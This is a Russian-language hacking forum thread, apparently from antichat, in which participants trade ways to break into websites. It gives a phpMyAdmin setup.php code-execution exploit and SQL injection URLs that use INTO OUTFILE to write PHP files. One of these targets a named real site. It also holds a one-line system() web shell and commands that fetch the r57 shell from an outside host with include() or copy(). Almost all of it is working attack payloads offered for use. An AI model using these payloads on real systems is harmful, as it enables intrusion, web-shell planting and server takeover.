Это сплоит на исполнение php кода # $pma_setup_url = 'http://site.com/phpMyAdmin/scripts/setup.php'; /*полный адрес скрипта установки phpMyAdmin*/ # $ftp_code = 'ftp://user[email protected]/www/test.txt'; /*полный ftp-путь до файла с содержимым <? phpinfo();exit; ?>*/ В $pma_setup_url путь pma.... В $ftp_code путь к текстовому файлу на фтпшке, в этом файле будет пхп код который ты хочеш испольнить,например тот же phpinfo(); Что может быть проше?
Вы просто пипец.. Если вы не можете прочитать пару статей на эту тему, то хоть "сконструируйте" логический вопрос. Может я старомоден, но люблю начинать с конца. http://www.plan-art.co.uk/brochures.php?catid=-5+union+select+'<?php echo "Hello from antichat =)"; ?>',null+from+mysql.user+into+outfile+'C:/plan/def/hello.php' Урл без ввв > http://plan-art.co.uk/hello.php - палюсь
Залил shell <? @system($_REQUEST["v"]); ?>, работает. http://site.com/index.php?id=1+UNION+SELECT+1,'<? @system($_REQUEST["v"]); ?>',2,3,4,5,6+into+outfile+'/data/web/www/shell.php'+--+ Как теперь залить r57shell.php , без загрузки формы?
?v=include("yoursite.ru/r57.php"); (allow_url_include=On) ?v=copy($_GET,$_GET[d]);&s=http://yoursite.ru/shell.txt&d=/data/web/www/r57.php; но это при eval, зачем system PHP: '<?php eval($_GET[v]);?>'
это уже другое дело, но нету гарантии что на сервере установлен wget ) зачем затруднять все ((( copy($source, $destination);
там винда, вгет не пашет.. Konqi хорошо написал, грузи через ?v=copy($_GET,$_GET[d]);&s=http://yoursite.ru/shell.txt&d=/data/web/www/r57.php
